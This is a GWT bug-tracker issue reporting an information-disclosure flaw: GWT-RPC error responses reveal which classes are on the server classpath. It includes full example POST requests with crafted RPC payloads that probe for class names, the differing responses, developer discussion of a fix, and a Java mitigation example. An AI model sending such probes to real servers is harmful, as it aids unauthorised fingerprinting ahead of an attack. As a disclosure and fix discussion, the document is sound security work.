gwtproject / gwt

GWT Open Source Project
http://www.gwtproject.org

Information Disclosure (Classpath Fingerprinting) #8558

Open dankurka opened 9 years ago

dankurka commented 9 years ago

Originally reported on Google Code with ID 8580

Found in GWT Release:

GWT 2.3.0

Encountered on OS / Browser:

n/a (server-side problem). Linux server.

Detailed description:

During a blackbox pentest I was able to successfully fingerprint the server classpath
(which is some kind of Information Disclosure) via error-based checks of whether certain classes
are available in the application's server classpath or not. This way I was able to
determine the JDBC driver loaded (and hence the database type and version used) etc.

Using this Information Disclosure about the server's classpath the attacker can fingerprint
which frameworks and libraries are used in the application (including information about
backend database drivers and the like) including their versions by checking if certain
class names (introduced in certain versions) are available or not.

The Google Security Team (which I contacted on this issue) advised me to post this
here as a public issue in the GWT bug tracker.

Shortest code snippet which demonstrates issue:

The following request (fingerprinting the existence of oracle.jdbc.OracleDriver as
an example check with "oracle.jdbc.OracleDriver" as payload):

POST /application/someapp/somepart HTTP/1.1
Host: example.com
Content-Type: text/x-gwt-rpc; charset=utf-8
X-GWT-Permutation: 1A3D772A9FBC17E884F76212EB604F54
X-GWT-Module-Base: https://example.com/application/someapp/

7|0|6|https://example.com/application/someapp/|A70812A01388A3C9292AD87689206D29|com.example.ui.web.gwt.client.ExampleService|prepareRendering|oracle.jdbc.OracleDriver/2|example.default|1|2|3|4|1|5|6|

resulted in the response:

HTTP/1.1 200 OK
Content-Disposition: attachment
Content-Length: 324
Content-Type: application/json; charset=utf-8
Content-Language: en-US

//EX[2,1,["com.google.gwt.user.client.rpc.IncompatibleRemoteServiceException/3936916533","This
application is out of date, please click the refresh button on your browser. ( Could
not locate requested method 'prepareRendering(oracle.jdbc.OracleDriver)' in interface
'com.example.ui.web.gwt.client.ExampleService' )"],0,7]

Whereas a non-existing class name results in another response (see the following request/response
for some.non.existing.ClassName as payload):

POST /application/someapp/somepart HTTP/1.1
Host: example.com
Content-Type: text/x-gwt-rpc; charset=utf-8
X-GWT-Permutation: 1A3D772A9FBC17E884F76212EB604F54
X-GWT-Module-Base: https://example.com/application/someapp/

7|0|6|https://example.com/application/someapp/|A70812A01388A3C9292AD87689206D29|com.example.ui.web.gwt.client.ExampleService|prepareRendering|some.non.existing.ClassName/2|example.default|1|2|3|4|1|5|6|

resulted in a response with the following ClassNotFoundException inside the JSON response
body:

HTTP/1.1 200 OK
Content-Disposition: attachment
Content-Length: 324
Content-Type: application/json; charset=utf-8
Content-Language: en-US

//EX[2,1,["com.google.gwt.user.client.rpc.IncompatibleRemoteServiceException/3936916533","java.lang.ClassNotFoundException:
some.non.existing.ClassName"],0,7]

Reported by mail@Christian-Schneider.net on 2014-02-16 17:37:17

dankurka commented 9 years ago
@Brian, @Mat you probably have an opinion right here?

Reported by dankurka@google.com on 2014-02-17 09:24:04

dankurka commented 9 years ago

Reported by dankurka@google.com on 2014-02-17 09:25:03

dankurka commented 9 years ago
We could probably fix this by checking that the class is listed in the security policy
before attempting to load it. That would still allow the attacker to deduce which classes
are in the security policy, but that doesn't seem as important since those are intentionally
client-side classes.

I'm probably not a good judge of severity; I'll defer to Matthew for that.

Reported by skybrian@google.com on 2014-02-18 04:00:27
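As an added example (not GWT's code and not the reporter's), the check proposed in the comment above written in plain Java without GWT dependencies: the serialization policy is consulted before any Class.forName call, and every rejected type name yields one fixed exception and message, so the two probes from the report (oracle.jdbc.OracleDriver and some.non.existing.ClassName) become indistinguishable to the client. The simplified policy-file parser, the RejectedTypeException type, the placeholder "/hash" suffixes and the suffix stripping are assumptions of this example, not GWT's API.

```java
import java.io.BufferedReader;
import java.io.IOException;
import java.io.StringReader;
import java.util.Collections;
import java.util.LinkedHashSet;
import java.util.Set;

/**
 * Resolves RPC parameter type names only after checking them against the
 * serialization policy. An unlisted name is rejected before any class-loading
 * attempt, with a message that is identical whether or not the class happens
 * to exist on the server classpath.
 */
public final class PolicyGatedTypeResolver {

    /** Single rejection type with a fixed message: no classpath-dependent detail reaches the client. */
    public static final class RejectedTypeException extends Exception {
        public RejectedTypeException() {
            super("Type not permitted by the serialization policy");
        }
    }

    private final Set<String> allowedTypes;
    private final ClassLoader loader;

    public PolicyGatedTypeResolver(Set<String> allowedTypes, ClassLoader loader) {
        this.allowedTypes = Collections.unmodifiableSet(new LinkedHashSet<>(allowedTypes));
        this.loader = loader;
    }

    /**
     * Parses a simplified policy listing (assumption: one entry per line, the first
     * comma-separated field being the binary class name; '#' and '@' lines are ignored).
     * This is not GWT's own .gwt.rpc parser.
     */
    public static Set<String> parsePolicy(String policyText) throws IOException {
        Set<String> names = new LinkedHashSet<>();
        try (BufferedReader in = new BufferedReader(new StringReader(policyText))) {
            String line;
            while ((line = in.readLine()) != null) {
                line = line.trim();
                if (line.isEmpty() || line.startsWith("#") || line.startsWith("@")) {
                    continue;
                }
                int comma = line.indexOf(',');
                names.add(comma < 0 ? line : line.substring(0, comma).trim());
            }
        }
        return names;
    }

    /**
     * @param typeSignature a wire-format type name such as "java.util.ArrayList/1"; the
     *                      "/hash" suffix is stripped before the policy lookup (assumption
     *                      based on the payload shape shown in the report).
     */
    public Class<?> resolve(String typeSignature) throws RejectedTypeException {
        int slash = typeSignature.indexOf('/');
        String typeName = slash < 0 ? typeSignature : typeSignature.substring(0, slash);

        // Policy check first: the classpath is never consulted for an unlisted name.
        if (!allowedTypes.contains(typeName)) {
            throw new RejectedTypeException();
        }
        try {
            // initialize=false: resolving a type must not run its static initializers.
            return Class.forName(typeName, false, loader);
        } catch (ClassNotFoundException | LinkageError e) {
            // A listed type that is missing is a deployment error worth logging server-side,
            // but the client still gets the same message as for any other rejection.
            throw new RejectedTypeException();
        }
    }

    public static void main(String[] args) throws Exception {
        // Constructed sample policy; the "/1" and "/2" hashes are placeholders.
        String policy = "# constructed sample policy\n"
                + "java.util.ArrayList, true, true, true, true, java.util.ArrayList/1, 2.3.0\n"
                + "java.lang.String, true, true, true, true, java.lang.String/2, 2.3.0\n";
        PolicyGatedTypeResolver resolver = new PolicyGatedTypeResolver(
                parsePolicy(policy), PolicyGatedTypeResolver.class.getClassLoader());

        // A listed type resolves normally.
        System.out.println(resolver.resolve("java.util.ArrayList/1").getName());

        // Both probes from the report produce the same exception and message,
        // regardless of whether the named class is present on the classpath.
        for (String probe : new String[] {"oracle.jdbc.OracleDriver/2", "some.non.existing.ClassName/2"}) {
            try {
                resolver.resolve(probe);
            } catch (RejectedTypeException e) {
                System.out.println(probe + " -> " + e.getMessage());
            }
        }
    }
}
```

Compile and run with javac/java; the output is the ArrayList class name followed by two rejection lines that differ only in the probe string echoed by main, not in anything derived from the server. The remaining observable difference the comment above accepts, that an attacker can learn which names are in the policy, is bounded by the policy file, which ships to the client anyway.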

dankurka commented 9 years ago

Reported by t.broyer on 2014-02-18 09:31:38

dankurka commented 9 years ago
Eventually this CVE http://wicket.apache.org/2014/02/21/cve-2014-0043.html might help
to classify it: information disclosure about available classes, helpful during fingerprinting
of a target.

Reported by mail@Christian-Schneider.net on 2014-02-26 00:21:57

dankurka commented 9 years ago
Seems like something worth trying to fix.

Reported by mdempsky@google.com on 2014-02-26 00:33:50